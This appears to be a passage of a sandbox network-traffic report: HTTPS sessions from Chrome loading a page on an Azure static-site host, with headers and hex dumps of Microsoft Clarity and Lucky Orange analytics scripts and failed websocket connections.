                                                        Data Ascii: zyl|j8 $vMxlgn:io'rd2c36!R0[T%}Ziu"vV9+8mK}Qw"TYN:EKL!"<oy`vrK9'N*1%C^-W|7I W[`dle8!c?!"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.44979813.107.246.634435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:34:54 UTC620OUTGET /s/0.7.56/clarity.js HTTP/1.1
                                                        Host: www.clarity.ms
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://ddbsodvnnadewe.z1.web.core.windows.net/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: CLID=185a6c8731cc4b10811644b6f0bc1620.20241128.20251128
                                                        2024-11-28 12:34:54 UTC550INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:34:54 GMT
                                                        Content-Type: application/javascript;charset=utf-8
                                                        Content-Length: 67359
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Last-Modified: Wed, 27 Nov 2024 12:08:58 GMT
                                                        ETag: "0x8DD0EDC462F0477"
                                                        x-ms-request-id: aea25050-501e-0029-57d0-4010af000000
                                                        x-ms-version: 2018-03-28
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20241128T123454Z-174f78459685726chC1EWRsnbg0000000yc000000000bmbw
                                                        Cache-Control: public, max-age=86400
                                                        x-fd-int-roxy-purgeid: 79034942
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:34:54 UTC15834INData Raw: 2f 2a 20 63 6c 61 72 69 74 79 2d 6a 73 20 76 30 2e 37 2e 35 36 3a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 69 63 72 6f 73 6f 66 74 2f 63 6c 61 72 69 74 79 20 28 4c 69 63 65 6e 73 65 3a 20 4d 49 54 29 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 5f 5f 70 72 6f 74 6f 5f 5f 3a 6e 75 6c 6c 2c 67 65 74 20 71 75 65 75 65 28 29 7b 72 65 74 75 72 6e 20 64 72 7d 2c 67 65 74 20 73 74 61 72 74 28 29 7b 72 65 74 75 72 6e 20 6c 72 7d 2c 67 65 74 20 73 74 6f 70 28 29 7b 72 65 74 75 72 6e 20 66 72 7d 2c 67 65 74 20 74 72 61 63 6b 28 29 7b 72 65 74 75 72 6e 20 69 72 7d 7d 29 2c 65 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 5f 5f 70 72 6f
                                                        Data Ascii: /* clarity-js v0.7.56: https://github.com/microsoft/clarity (License: MIT) */!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return dr},get start(){return lr},get stop(){return fr},get track(){return ir}}),e=Object.freeze({__pro
                                                        2024-11-28 12:34:54 UTC16384INData Raw: 65 6c 65 63 74 6f 72 3a 6e 75 6c 6c 2c 68 61 73 68 3a 6e 75 6c 6c 2c 72 65 67 69 6f 6e 3a 73 2c 6d 65 74 61 64 61 74 61 3a 7b 61 63 74 69 76 65 3a 21 30 2c 73 75 73 70 65 6e 64 3a 21 31 2c 70 72 69 76 61 63 79 3a 64 2c 70 6f 73 69 74 69 6f 6e 3a 6e 75 6c 6c 2c 66 72 61 75 64 3a 6c 2c 73 69 7a 65 3a 6e 75 6c 6c 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 61 2c 72 3d 65 2e 64 61 74 61 2c 69 3d 65 2e 6d 65 74 61 64 61 74 61 2c 6f 3d 69 2e 70 72 69 76 61 63 79 2c 75 3d 72 2e 61 74 74 72 69 62 75 74 65 73 7c 7c 7b 7d 2c 63 3d 72 2e 74 61 67 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3b 73 77 69 74 63 68 28 21 30 29 7b 63 61 73 65 20 50 74 2e 69 6e 64 65 78 4f 66 28 63 29 3e 3d 30 3a 76 61 72 20 73 3d 75 2e 74 79 70 65 2c 6c 3d 22 22 2c
                                                        Data Ascii: elector:null,hash:null,region:s,metadata:{active:!0,suspend:!1,privacy:d,position:null,fraud:l,size:null}},function(t,e,n){var a,r=e.data,i=e.metadata,o=i.privacy,u=r.attributes||{},c=r.tag.toUpperCase();switch(!0){case Pt.indexOf(c)>=0:var s=u.type,l="",
                                                        2024-11-28 12:34:54 UTC16384INData Raw: 62 72 65 61 6b 3b 63 61 73 65 22 70 72 6f 64 75 63 74 22 3a 51 72 28 35 2c 74 5b 61 5d 29 2c 51 72 28 31 30 2c 74 2e 6e 61 6d 65 29 2c 51 72 28 31 32 2c 74 2e 73 6b 75 29 2c 74 2e 62 72 61 6e 64 26 26 51 72 28 36 2c 74 2e 62 72 61 6e 64 2e 6e 61 6d 65 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 61 67 67 72 65 67 61 74 65 72 61 74 69 6e 67 22 3a 74 2e 72 61 74 69 6e 67 56 61 6c 75 65 26 26 28 57 28 31 31 2c 24 6e 28 74 2e 72 61 74 69 6e 67 56 61 6c 75 65 2c 31 30 30 29 29 2c 57 28 31 38 2c 24 6e 28 74 2e 62 65 73 74 52 61 74 69 6e 67 29 29 2c 57 28 31 39 2c 24 6e 28 74 2e 77 6f 72 73 74 52 61 74 69 6e 67 29 29 29 2c 57 28 31 32 2c 24 6e 28 74 2e 72 61 74 69 6e 67 43 6f 75 6e 74 29 29 2c 57 28 31 37 2c 24 6e 28 74 2e 72 65 76 69 65 77 43 6f 75 6e 74 29 29 3b 62
                                                        Data Ascii: break;case"product":Qr(5,t[a]),Qr(10,t.name),Qr(12,t.sku),t.brand&&Qr(6,t.brand.name);break;case"aggregaterating":t.ratingValue&&(W(11,$n(t.ratingValue,100)),W(18,$n(t.bestRating)),W(19,$n(t.worstRating))),W(12,$n(t.ratingCount)),W(17,$n(t.reviewCount));b
                                                        2024-11-28 12:34:55 UTC16384INData Raw: 72 6e 20 72 74 28 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 73 77 69 74 63 68 28 65 3d 5b 73 28 29 2c 74 5d 2c 74 29 7b 63 61 73 65 20 33 31 3a 65 2e 70 75 73 68 28 6d 72 2e 6d 65 73 73 61 67 65 29 2c 65 2e 70 75 73 68 28 6d 72 2e 6c 69 6e 65 29 2c 65 2e 70 75 73 68 28 6d 72 2e 63 6f 6c 75 6d 6e 29 2c 65 2e 70 75 73 68 28 6d 72 2e 73 74 61 63 6b 29 2c 65 2e 70 75 73 68 28 79 28 6d 72 2e 73 6f 75 72 63 65 29 29 2c 64 72 28 65 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 33 3a 6b 72 26 26 28 65 2e 70 75 73 68 28 6b 72 2e 63 6f 64 65 29 2c 65 2e 70 75 73 68 28 6b 72 2e 6e 61 6d 65 29 2c 65 2e 70 75 73 68 28 6b 72 2e 6d 65 73 73 61 67 65 29 2c 65 2e 70 75 73 68 28 6b 72 2e 73 74 61 63 6b 29 2c 65 2e 70 75 73 68 28 6b 72 2e 73 65 76 65 72 69 74 79 29
                                                        Data Ascii: rn rt(this,(function(n){switch(e=[s(),t],t){case 31:e.push(mr.message),e.push(mr.line),e.push(mr.column),e.push(mr.stack),e.push(y(mr.source)),dr(e);break;case 33:kr&&(e.push(kr.code),e.push(kr.name),e.push(kr.message),e.push(kr.stack),e.push(kr.severity)
                                                        2024-11-28 12:34:55 UTC2373INData Raw: 65 29 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 61 3d 74 5b 6e 5d 3b 73 77 69 74 63 68 28 61 2e 65 6e 74 72 79 54 79 70 65 29 7b 63 61 73 65 22 6e 61 76 69 67 61 74 69 6f 6e 22 3a 5a 69 28 61 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 72 65 73 6f 75 72 63 65 22 3a 76 61 72 20 72 3d 61 2e 6e 61 6d 65 3b 51 72 28 34 2c 68 6f 28 72 29 29 2c 72 21 3d 3d 6f 2e 75 70 6c 6f 61 64 26 26 72 21 3d 3d 6f 2e 66 61 6c 6c 62 61 63 6b 7c 7c 57 28 32 38 2c 61 2e 64 75 72 61 74 69 6f 6e 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 6c 6f 6e 67 74 61 73 6b 22 3a 48 28 37 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 66 69 72 73 74 2d 69 6e 70 75 74 22 3a 65 26 26 57 28 31 30 2c 61 2e 70 72 6f 63 65 73 73 69 6e 67 53 74 61 72 74 2d 61 2e 73 74 61 72 74 54 69
                                                        Data Ascii: e),n=0;n<t.length;n++){var a=t[n];switch(a.entryType){case"navigation":Zi(a);break;case"resource":var r=a.name;Qr(4,ho(r)),r!==o.upload&&r!==o.fallback||W(28,a.duration);break;case"longtask":H(7);break;case"first-input":e&&W(10,a.processingStart-a.startTi


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.44980513.107.246.634435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:34:57 UTC422OUTGET /s/0.7.56/clarity.js HTTP/1.1
                                                        Host: www.clarity.ms
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: CLID=185a6c8731cc4b10811644b6f0bc1620.20241128.20251128
                                                        2024-11-28 12:34:57 UTC550INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:34:57 GMT
                                                        Content-Type: application/javascript;charset=utf-8
                                                        Content-Length: 67359
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Last-Modified: Wed, 27 Nov 2024 12:08:58 GMT
                                                        ETag: "0x8DD0EDC462F0477"
                                                        x-ms-request-id: aea25050-501e-0029-57d0-4010af000000
                                                        x-ms-version: 2018-03-28
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20241128T123457Z-174f7845968jrjrxhC1EWRmmrs0000000yq0000000000ekv
                                                        Cache-Control: public, max-age=86400
                                                        x-fd-int-roxy-purgeid: 79034942
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:34:57 UTC15834INData Raw: 2f 2a 20 63 6c 61 72 69 74 79 2d 6a 73 20 76 30 2e 37 2e 35 36 3a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 69 63 72 6f 73 6f 66 74 2f 63 6c 61 72 69 74 79 20 28 4c 69 63 65 6e 73 65 3a 20 4d 49 54 29 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 5f 5f 70 72 6f 74 6f 5f 5f 3a 6e 75 6c 6c 2c 67 65 74 20 71 75 65 75 65 28 29 7b 72 65 74 75 72 6e 20 64 72 7d 2c 67 65 74 20 73 74 61 72 74 28 29 7b 72 65 74 75 72 6e 20 6c 72 7d 2c 67 65 74 20 73 74 6f 70 28 29 7b 72 65 74 75 72 6e 20 66 72 7d 2c 67 65 74 20 74 72 61 63 6b 28 29 7b 72 65 74 75 72 6e 20 69 72 7d 7d 29 2c 65 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 5f 5f 70 72 6f
                                                        Data Ascii: /* clarity-js v0.7.56: https://github.com/microsoft/clarity (License: MIT) */!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return dr},get start(){return lr},get stop(){return fr},get track(){return ir}}),e=Object.freeze({__pro
                                                        2024-11-28 12:34:57 UTC16384INData Raw: 65 6c 65 63 74 6f 72 3a 6e 75 6c 6c 2c 68 61 73 68 3a 6e 75 6c 6c 2c 72 65 67 69 6f 6e 3a 73 2c 6d 65 74 61 64 61 74 61 3a 7b 61 63 74 69 76 65 3a 21 30 2c 73 75 73 70 65 6e 64 3a 21 31 2c 70 72 69 76 61 63 79 3a 64 2c 70 6f 73 69 74 69 6f 6e 3a 6e 75 6c 6c 2c 66 72 61 75 64 3a 6c 2c 73 69 7a 65 3a 6e 75 6c 6c 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 61 2c 72 3d 65 2e 64 61 74 61 2c 69 3d 65 2e 6d 65 74 61 64 61 74 61 2c 6f 3d 69 2e 70 72 69 76 61 63 79 2c 75 3d 72 2e 61 74 74 72 69 62 75 74 65 73 7c 7c 7b 7d 2c 63 3d 72 2e 74 61 67 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3b 73 77 69 74 63 68 28 21 30 29 7b 63 61 73 65 20 50 74 2e 69 6e 64 65 78 4f 66 28 63 29 3e 3d 30 3a 76 61 72 20 73 3d 75 2e 74 79 70 65 2c 6c 3d 22 22 2c
                                                        Data Ascii: elector:null,hash:null,region:s,metadata:{active:!0,suspend:!1,privacy:d,position:null,fraud:l,size:null}},function(t,e,n){var a,r=e.data,i=e.metadata,o=i.privacy,u=r.attributes||{},c=r.tag.toUpperCase();switch(!0){case Pt.indexOf(c)>=0:var s=u.type,l="",
                                                        2024-11-28 12:34:57 UTC16384INData Raw: 62 72 65 61 6b 3b 63 61 73 65 22 70 72 6f 64 75 63 74 22 3a 51 72 28 35 2c 74 5b 61 5d 29 2c 51 72 28 31 30 2c 74 2e 6e 61 6d 65 29 2c 51 72 28 31 32 2c 74 2e 73 6b 75 29 2c 74 2e 62 72 61 6e 64 26 26 51 72 28 36 2c 74 2e 62 72 61 6e 64 2e 6e 61 6d 65 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 61 67 67 72 65 67 61 74 65 72 61 74 69 6e 67 22 3a 74 2e 72 61 74 69 6e 67 56 61 6c 75 65 26 26 28 57 28 31 31 2c 24 6e 28 74 2e 72 61 74 69 6e 67 56 61 6c 75 65 2c 31 30 30 29 29 2c 57 28 31 38 2c 24 6e 28 74 2e 62 65 73 74 52 61 74 69 6e 67 29 29 2c 57 28 31 39 2c 24 6e 28 74 2e 77 6f 72 73 74 52 61 74 69 6e 67 29 29 29 2c 57 28 31 32 2c 24 6e 28 74 2e 72 61 74 69 6e 67 43 6f 75 6e 74 29 29 2c 57 28 31 37 2c 24 6e 28 74 2e 72 65 76 69 65 77 43 6f 75 6e 74 29 29 3b 62
                                                        Data Ascii: break;case"product":Qr(5,t[a]),Qr(10,t.name),Qr(12,t.sku),t.brand&&Qr(6,t.brand.name);break;case"aggregaterating":t.ratingValue&&(W(11,$n(t.ratingValue,100)),W(18,$n(t.bestRating)),W(19,$n(t.worstRating))),W(12,$n(t.ratingCount)),W(17,$n(t.reviewCount));b
                                                        2024-11-28 12:34:58 UTC16384INData Raw: 72 6e 20 72 74 28 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 73 77 69 74 63 68 28 65 3d 5b 73 28 29 2c 74 5d 2c 74 29 7b 63 61 73 65 20 33 31 3a 65 2e 70 75 73 68 28 6d 72 2e 6d 65 73 73 61 67 65 29 2c 65 2e 70 75 73 68 28 6d 72 2e 6c 69 6e 65 29 2c 65 2e 70 75 73 68 28 6d 72 2e 63 6f 6c 75 6d 6e 29 2c 65 2e 70 75 73 68 28 6d 72 2e 73 74 61 63 6b 29 2c 65 2e 70 75 73 68 28 79 28 6d 72 2e 73 6f 75 72 63 65 29 29 2c 64 72 28 65 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 33 3a 6b 72 26 26 28 65 2e 70 75 73 68 28 6b 72 2e 63 6f 64 65 29 2c 65 2e 70 75 73 68 28 6b 72 2e 6e 61 6d 65 29 2c 65 2e 70 75 73 68 28 6b 72 2e 6d 65 73 73 61 67 65 29 2c 65 2e 70 75 73 68 28 6b 72 2e 73 74 61 63 6b 29 2c 65 2e 70 75 73 68 28 6b 72 2e 73 65 76 65 72 69 74 79 29
                                                        Data Ascii: rn rt(this,(function(n){switch(e=[s(),t],t){case 31:e.push(mr.message),e.push(mr.line),e.push(mr.column),e.push(mr.stack),e.push(y(mr.source)),dr(e);break;case 33:kr&&(e.push(kr.code),e.push(kr.name),e.push(kr.message),e.push(kr.stack),e.push(kr.severity)
                                                        2024-11-28 12:34:58 UTC2373INData Raw: 65 29 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 61 3d 74 5b 6e 5d 3b 73 77 69 74 63 68 28 61 2e 65 6e 74 72 79 54 79 70 65 29 7b 63 61 73 65 22 6e 61 76 69 67 61 74 69 6f 6e 22 3a 5a 69 28 61 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 72 65 73 6f 75 72 63 65 22 3a 76 61 72 20 72 3d 61 2e 6e 61 6d 65 3b 51 72 28 34 2c 68 6f 28 72 29 29 2c 72 21 3d 3d 6f 2e 75 70 6c 6f 61 64 26 26 72 21 3d 3d 6f 2e 66 61 6c 6c 62 61 63 6b 7c 7c 57 28 32 38 2c 61 2e 64 75 72 61 74 69 6f 6e 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 6c 6f 6e 67 74 61 73 6b 22 3a 48 28 37 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 66 69 72 73 74 2d 69 6e 70 75 74 22 3a 65 26 26 57 28 31 30 2c 61 2e 70 72 6f 63 65 73 73 69 6e 67 53 74 61 72 74 2d 61 2e 73 74 61 72 74 54 69
                                                        Data Ascii: e),n=0;n<t.length;n++){var a=t[n];switch(a.entryType){case"navigation":Zi(a);break;case"resource":var r=a.name;Qr(4,ho(r)),r!==o.upload&&r!==o.fallback||W(28,a.duration);break;case"longtask":H(7);break;case"first-input":e&&W(10,a.processingStart-a.startTi


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.44980835.201.124.94435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:34:57 UTC554OUTGET /socket.io/?EIO=3&transport=websocket HTTP/1.1
                                                        Host: in.visitors.live
                                                        Connection: Upgrade
                                                        Pragma: no-cache
                                                        Cache-Control: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Upgrade: websocket
                                                        Origin: https://ddbsodvnnadewe.z1.web.core.windows.net
                                                        Sec-WebSocket-Version: 13
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sec-WebSocket-Key: cgPcJp3GuzBH0JIAyLLTuA==
                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                        2024-11-28 12:34:57 UTC218INHTTP/1.1 400 Bad Request
                                                        Content-Type: application/json
                                                        Date: Thu, 28 Nov 2024 12:34:57 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2024-11-28 12:34:57 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 22{"code":3,"message":"Bad request"}0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.44980935.244.167.1024435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:34:57 UTC560OUTGET /mqtt HTTP/1.1
                                                        Host: realtime.luckyorange.com
                                                        Connection: Upgrade
                                                        Pragma: no-cache
                                                        Cache-Control: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Upgrade: websocket
                                                        Origin: https://ddbsodvnnadewe.z1.web.core.windows.net
                                                        Sec-WebSocket-Version: 13
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sec-WebSocket-Key: HePntTmWhOmsxw9TwI0Ohw==
                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                        Sec-WebSocket-Protocol: mqtt
                                                        2024-11-28 12:34:57 UTC219INHTTP/1.1 426 unknown
                                                        Content-Length: 0
                                                        date: Thu, 28 Nov 2024 12:34:57 GMT
                                                        sec-websocket-protocol: mqtt
                                                        server: Cowboy
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.449807108.158.75.104435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:34:57 UTC367OUTGET /core/core.js?v=49d958c HTTP/1.1
                                                        Host: tools.luckyorange.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-28 12:34:58 UTC549INHTTP/1.1 200 OK
                                                        Content-Type: text/javascript
                                                        Content-Length: 65516
                                                        Connection: close
                                                        Date: Thu, 28 Nov 2024 12:34:59 GMT
                                                        Last-Modified: Wed, 06 Nov 2024 20:50:23 GMT
                                                        ETag: "ceb76217aaf3b7ca62d964b6ad16fab3"
                                                        x-amz-server-side-encryption: AES256
                                                        Cache-Control: max-age=31536000
                                                        Content-Encoding: gzip
                                                        Accept-Ranges: bytes
                                                        Server: AmazonS3
                                                        X-Cache: Miss from cloudfront
                                                        Via: 1.1 58d3c503a480576abdfaa9676970b67c.cloudfront.net (CloudFront)
                                                        X-Amz-Cf-Pop: BAH53-P2
                                                        X-Amz-Cf-Id: f-XT4CaNkhgut41_zmbl0sSWHU-iCVhz2LRuVzB4N5RqPCiqCZca_w==
                                                        2024-11-28 12:34:58 UTC15835INData Raw: 1f 8b 08 00 00 00 00 00 02 03 dc bd eb 9a db 46 b2 20 f8 2a 2c b4 0f 0d 88 59 28 b2 aa 74 03 05 71 65 49 ee 56 1f dd da 25 b7 cf 59 8a d6 a0 c0 64 11 16 08 d0 b8 54 a9 4c 72 3e cf ee ce 5e bf 6f 1f 60 ff ec fc 9d 5f fb 0e e7 4d c6 fb 22 1b 11 79 41 02 04 59 25 b7 ba bf 9d 71 b7 8a 40 22 af 91 99 91 11 91 71 b1 67 65 12 16 51 9a d8 9c 15 ce 6a 96 66 f6 65 90 75 92 4e 94 74 0a 87 8f 93 89 5f c0 9f 8d 63 17 f3 28 67 55 6e c8 2b 9f 3b 85 6d 96 64 29 8b a0 4c 7f c2 02 f8 19 4c 58 ee f7 59 e9 8f 27 c3 fc 51 e4 c6 3c b9 28 e6 c3 bc d7 73 52 3f 1a e7 13 f6 e6 fc 27 1e 16 ee 32 4b 8b b4 b8 5e 72 77 1e e4 6f ae 92 b7 59 ba e4 59 71 ed 86 41 1c db 19 4b 9d 6e 37 1b a7 93 6e b7 74 97 65 3e b7 f1 05 5a 71 18 3e f8 fd 21 76 80 ba 1d 38 b7 aa 32 60 09 54 69 d3 10 03 f8
                                                        Data Ascii: F *,Y(tqeIV%YdTLr>^o`_M"yAY%q@"qgeQjfeuNt_c(gUn+;md)LLXY'Q<(sR?'2K^rwoYYqAKn7nte>Zq>!v82`Ti
                                                        2024-11-28 12:34:58 UTC1114INData Raw: 13 9f da c7 40 81 fe 13 aa a7 d0 09 5a 03 4a cb 2c f6 87 a8 fe 8f 9a cc e7 d7 05 7f 29 ef fa c9 c5 2d e0 29 1a 13 ac 45 ab 2c 66 87 0f 2c 47 8c 0b a3 f9 2a 20 e8 68 ef 95 32 b4 11 f1 9d 8e 87 7c 4f 4c 76 9c b9 a3 3f ac df 57 67 e6 7b f7 88 45 ad 22 b7 7c 8c 76 0b a6 5e 61 09 3d 3d 20 f1 56 1b 75 31 ca 50 a7 ed e0 a0 a0 20 82 11 1c b9 d9 22 88 51 a4 d8 82 b3 b4 ad 91 c6 26 29 b1 65 75 cc b0 21 26 02 65 04 e2 5c 8a dc d7 4f de bd f8 eb 73 1f 03 52 a1 ee ed db 37 2f ff f5 db 17 2f 5f fa d6 5b 93 4a 8e 76 80 00 dd 10 0b 72 06 89 97 53 22 5e 22 84 05 6a c3 51 fd cf 78 92 a2 0f ec 6e 37 77 95 85 d0 7a 0d 43 0e d5 2b 90 b9 25 50 51 ee e5 83 61 3c 4a 51 53 2a 36 34 4c 50 a3 eb d1 e9 08 d8 6b 78 e8 65 78 b3 16 00 bc 0e d0 49 ae 52 b5 78 3e bd e0 ef 8f 28 8a cb 91
                                                        Data Ascii: @ZJ,)-)E,f,G* h2|OLv?Wg{E"|v^a== Vu1P "Q&)eu!&e\OsR7//_[JvrS"^"jQxn7wzC+%PQa<JQS*64LPkxexIRx>(
                                                        2024-11-28 12:34:58 UTC16384INData Raw: e8 65 2b 4c 16 dd ee 01 f0 6a c2 17 c3 16 3c d9 45 af 27 b5 80 1a ab 6b 0c a5 27 b8 95 af 00 8c 09 2a 13 f2 b7 01 15 1a 57 c0 b0 96 48 77 4c f0 96 2d bd 21 63 2a 33 ea 78 0c 12 b0 95 0b 55 a7 72 c7 8a 70 c7 0e c3 d9 a1 78 6d 58 a6 b0 44 ea 69 6d e7 4a bb b0 87 b0 f1 79 ed a6 13 19 06 3b 21 bb 03 29 79 c4 ef 08 c9 d6 cd 8d 1f 81 dc bc 42 89 07 af e0 97 d8 66 3c 21 d4 5c 52 a7 d1 b4 a3 64 23 1d e4 c6 51 02 27 aa 45 92 d8 6c 12 31 43 8c 9b e5 04 9d 29 4b 96 c9 04 a4 f7 a5 3c fb 8c 27 ac 4d 19 ae ae f5 26 a3 5c 24 fe 0a 11 80 d7 67 84 1a bc 01 c3 b9 f6 8e 19 ce a4 77 c2 e4 d4 7a a7 ac 5c 5e 64 40 89 78 77 31 4a d6 d2 bb b7 61 c2 be 65 9f a6 50 0f 3d 74 6e 48 fd 7b 2b 62 54 66 78 e3 d5 0e cf f5 52 c2 40 ca 42 98 4c 04 46 13 42 b5 3b 00 72 6f bc 15 4b 59 df 18
                                                        Data Ascii: e+Lj<E'k'*WHwL-!c*3xUrpxmXDimJy;!)yBf<!\Rd#Q'El1C)K<'M&\$gwz\^d@xw1JaeP=tnH{+bTfxR@BLFB;roKY
                                                        2024-11-28 12:34:58 UTC16384INData Raw: bf 85 72 9f 5c be cc cf 33 0a 55 47 b8 b4 d0 a7 33 da 57 67 34 da c2 cb e3 da 57 c7 35 fa ed 88 9f a5 83 3b c7 85 54 31 1a 49 cb 98 59 5c 4b 8a fe 15 26 0a dd 6f e4 83 23 f8 a4 31 6e 0f e0 4f f0 a6 9f e0 b8 d6 8c 4c 8b 45 a1 6e eb ec fc ef ef 07 78 72 e5 5e b4 ae e1 c0 4f cb 42 59 8a bc 40 2b f3 d2 27 b9 11 bf 75 ed a9 7d ca ac 9b 2c 9b b9 9b 9b f7 f7 f7 ad fb ad 56 9c 5c 6f 76 5e bd 7a b5 f9 0d f9 59 8b 54 6b 64 5c 82 f6 5e 9f 4e 8f 68 0d 44 69 21 95 e4 47 25 29 29 79 01 49 b3 8f e8 09 52 3f 33 07 c9 7b be 5f 91 b7 37 97 5a 1a f4 fd d0 af 87 73 e0 16 24 e9 d3 67 d0 d4 e1 b1 4f 86 53 6a c6 c8 9b 2a 6b 65 3d 6c 3e 17 a0 8d 11 97 fa 81 1d be 77 05 fa 71 1d 83 9e de 04 41 d6 1a a7 e9 e9 7c 8a 4c fa ad 3f ab 94 5a 02 cc 83 7c 27 de bd f5 f8 91 8c f7 14 79 c5
                                                        Data Ascii: r\3UG3Wg4W5;T1IY\K&o#1nOLEnxr^OBY@+'u},V\ov^zYTkd\^NhDi!G%))yIR?3{_7Zs$gOSj*ke=l>wqA|L?Z|'y
